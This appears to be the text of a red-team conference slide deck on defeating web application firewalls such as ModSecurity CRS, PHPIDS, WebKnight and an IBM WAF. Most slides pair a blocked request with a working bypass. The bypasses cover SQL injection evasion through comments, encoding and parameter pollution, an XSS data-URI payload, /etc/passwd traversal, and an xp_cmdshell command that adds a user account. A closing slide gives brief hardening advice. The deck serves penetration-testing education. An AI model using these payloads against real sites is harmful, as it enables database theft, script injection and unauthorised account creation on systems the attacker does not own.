Web Application Firewall (WAF)Suckseed or Succeed !?

Mr.Prathan Phongthiproek Consulting Manager, Red TeamACIS Professional Center

Who am I ?

ACIS Professional Center

Manager of the Red Team

Specializing in Attack & Penetration

Information Security Consulting Manager

Instructor and Speaker

Founder of CWH Underground Hacker

Aka 0x7a657133756c

Let’s RevealIntroduction to Web Application Firewall (WAF)

Breach it !! Filter Evasion

HTTP Parameter Contamination

HTTP Pollution: Split and Join

Conclusion

Introduction to Web Application Firewall (WAF)

Web Application Hacking

7 of 10 sites are vulnerable

70% of Cyber attacks are on web ports

95% of companies are hacked through web ports

Anonymous and Lulzsec

Hacker with Operation

#AntiSec

Web Application Hacking

Top 3 Web App AttacksCross Site Scripting

File Inclusion (Remote/Local)

SQL Injection (Normal/Blind/Time based/Regex...)

Misunderstand for Harden Web Application

What’s WAF ?

Emerged from IDS/IPS focused on HTTP protocol and HTTP related attacks

Usually contain a lot of complex

reg-exp rules to match (Blacklist)

For most WAF vendors they are “Closely guarded secrets”

Open-source WAFs (Mod_security and PHPIDS) have open source rules

Understand Blacklist

Detection and ProtectionSQL Injection

Cross Site Scripting

Local and Remote File Inclusion

Code/Command Injection

Directory Traversal

Buffer Overflow

Cookie Poisoning

Parameter Tampering

Upload File Mis-Handling

Information Disclosure

Etc...

WAFs VendorsArmorize

Barracuda

Cisco ACE

Citrix Netscaler

F5

Imperva SecureSphere

Radware Appwall

Profense

Bee-ware

BinarySec

Mod Security

WebKnight

DenyAll

Fortify

Visonys

Pentasecurity

Other..

WAF implementation

Breach it !! (CMS and WAFs)“เอาอยู ่เอาอยู.่......แตกแล้ว”

Filter Evasion (SQLi)

PHP: Magic_quote On, Mysql_real_escape_string, Addslashes

‘ “ -> \’ \”

id=1 and 1=2 union select 1,group_concat(column_name) from information_schema.columns where table_name=‘users’

Filter Evasion (SQLi)

PHP: Magic_quote On, Mysql_real_escape_string, Addslashes

‘ “ -> \’ \”

id=1 and 1=2 union select 1,group_concat(column_name) from information_schema.columns where table_name=0x7573657273

Filter Evasion (SQLi)

PHP: Magic_quote On, Mysql_real_escape_string, Addslashes

String to ASCII

id=1 and 1=2 union select 1,load_file(CHAR(47,118,97,114,47,119,119,119,47,104,116,109,108,47,99,111,110,102,105,103,47,99,111,110,102,105,103,46,105,110,99,46,112,104,112))

Filter Evasion (SQLi)

Comments //,--,/**/,/*,#,%00

id=1+un/**/ion+se/**/lect+1,2,3--

Case Changing (lower case)

/union\sselect/gid=1+UnIoN/**/SeLecT/**/1,2,3--

Replaced keywordsid=1+UnunionIoN+SeselectLecT+1,2,3--

Filter Evasion (SQLi)

Case Study: NukeSentinel (PHP Nuke)Encode to Hex

Forbidden: http://victim.com/php-nuke/?/**/union/**/select.......

Bypass: http://victim.com/php-nuke/?/%2A%2A/union/%2A%2A/select.......

Bypass: http://victim.com/php-nuke/?%2F**%2Funion%2F**%2Fselect.......

Filter Evasion (SQLi)Buffer Overflow (For C language)

id=1+and+(select 1)=(Select 0x41414141414141414141414141414141.....)+UnIoN+SeLecT+1,version(),3,database(),user(),6,7,8,9,10--

Filter Evasion (SQLi)

Inline Comments (/*!......*/)A lot of WAFs was bypassed

Bypass IPS and Timeout

MySQL Only (http://dev.mysql.com/doc/refman/5.0/en/comments.html)

/union\sselect/ig

id=1/*!UnIoN*/+/*!SeLecT*/+1,2,concat(/*!table_name*/)+FrOm/*!information_schema*/.tables/*!WhErE*/+/*!TaBlE_sChEMa*/+like+database()--

Filter Evasion (SQLi)

Inline Comments (/*!......*/)

Filter Evasion (SQLi)

Censor

Filter Evasion (SQLi)

Other Bypasses: and -> &&

or -> ||

= -> like

substring() -> substr(), mid(), strcmp()

ascii() -> hex(), bin(), char(), ord()

benchmark() -> sleep()

Whitespace -> (),/**/,%0b

isnull, between

Filter Evasion (SQLi)

Case Study: PHPIDS

Filter Evasion (SQLi)

Case Study: PHPIDS

Filter Evasion (SQLi)

Case Study: PHPIDS

Filter Evasion (SQLi)

Case Study: Mod Security CRS

SecRule REQUEST_FILENAME|ARGS_NAMES|ARGS|XML:/* "\bunion\b.{1,100}?\bselect\b" \

"phase2,rev:'2.2.1',capture,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:replaceComments,t:compressWhiteSpace,ctl:auditLogParts=+E,block,msg:'SQL Injection Attack',id:'959047',tag:'WEB_ATTACK/SQL_INJECTION',tag:'WASCTC/WASC-19',tag:'OWASP_TOP_10/A1',tag:'OWASP_AppSensor/CIE1',tag:'PCI/6.5.2',logdata:'%{TX.0}',severity:'2',setvar:'tx.msg=%{rule.msg}',setvar:tx.sql_injection_score=+%{tx.critical_anomaly_score},setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{tx.0}"

Filter Evasion (SQLi)

Case Study: Mod Security CRShttp://victim.com/news.php?id=0+div+1+union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A1%2C2%2Ccurrent_user

0 div 1 union#foo*/*barselect#foo1,2,current_user

0 div 1 union select 1,2,current_user

Filter Evasion

Cross Site Scripting (XSS)Forbidden: http://victim.com/search.php?q=javascript:alert('XSS')

Bypass: http://victim.com/search.php?q=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4=

File InclusionForbidden: http://victim.com/download.php?file=../../../etc/passwd

Bypass: http://victim.com/download.php?file=../../../etc/passwd..........

Bypass: http://victim.com/download.php?file=../../../foo/../etc/bar/../passwd

HTTP Parameter Contamination

HTTP Parameter Contamination

Bypass Mod_Security SQLi rule (modsecurity_crs_41)

Bypass URLScan 3.1 DenyQueryStringSequences rules

Bypass AQTRONIX Webknight WAF with “%”

HTTP Parameter Contamination

Case Study: AQTRONIX Webknighthttp://victim.com/news.asp?id=10 an%d 1=0/(sel%ect top 1 tab%le_name fr%om inform%ation_schema.tables)

10 an%d 1=0/(sel%ect top 1 tab%le_name fr%om inform%ation_schema.tables)

10 and 1=0/(select top 1 table_name from information_schema.tables)

HTTP Pollution: Split and Join

HPP is a quite simple but effective hacking technique

HPP attacks can be defined as the feasibility to override or add HTTP GET/POST parameters by injecting query string

Focus on ASP/ASP.net

A lot of WAF was bypassed

HTTP Pollution: Split and Join

HTTP Pollution: Split and Join

HTTP Pollution: Split and Join

HTTP Pollution: Split and Join

Basic Attack

Forbidden:http://victim.com/search.aspx?q=select name,password from user

Bypass:http://victim.com/search.aspx?q=select name&q=password from user

q=select nameq=password from user

q=select name,password from user

HTTP Pollution: Split and Join

HPP+Inline Comment (Bypass Commercial WAF)

Forbidden:http://victim.com/search.aspx?q=select name,password from user

Bypass:http://victim.com/search.aspx?q=select/*&q=*/name&q=password/*&q=*/from/*&q=*/user

q=select/*q=*/nameq=password/*q=*/from/*q=*/user

q=select/*,*/name,password/*,*/from/*,*/userq=select name,password from user

HTTP Pollution: Split and Join

HTTP Pollution: Split and JoinCase study: IBM Web Application Firewall (2011-6-21)

Forbidden:http://victim.com/news.aspx?id=1'; EXEC master..xp_cmdshell “net user lucifer UrWaFisShiT /add” --

Bypass:http://victim.com/news.aspx?id=1'; /*&id=1*/ EXEC /*&id=1*/ master..xp_cmdshell /*&id=1*/ “net user lucifer UrWaFisShiT” /*&id=1*/ --

id=1’; /*id=1*/ EXEC /*id=1*/ master..xp_cmdshell /*id=1*/ “net user lucifer UrWaFisShiT” /*id=1*/ --

id=1’; /*,1*/ EXEC /*,1*/ master..xp_cmdshell /*,1*/ “net user lucifer UrWaFisShiT” /*,1*/ --id=1’; EXEC master..xp_cmdshell “net user lucifer UrWaFisShiT” --

“ประเทศไทยต้องการ ความเปลี่ยนแปลง ถึงเวลาที่ทุกคนในประเทศตื่นตัวได้แล้ว ความโง่เขลาจักต้องหมดสิ้นไป”

How to protect your website ?

Implement Secure Software Development Life Cycle (SSDLC)

Secure Coding: Validate all inputs and outputs

Pentest before Online

Harden it !!

Re-visit Again

Deploy WAF (Optional)

ConclusionWAF is not the long-expected

It’s functional limitations, WAF is not able to protect a web app from all possible vulnerabilities

It’s necessary to adapt WAF filter to the particular web app being protected

WAF doesn’t eliminate a vulnerability, It just partly screens the attack vector

It suckseed or succeed !?

“Security Products not able to 100% protect from damn config/coding of admin. Just need a time and imagination for breach it !!”

Greetz To..

ACIS-Red Team

Kyle

Johannes Dahse

Ahmad Maulana

Luca Carettoni

Stefano di Paola

Ivan Markovic

All WAF products that I breached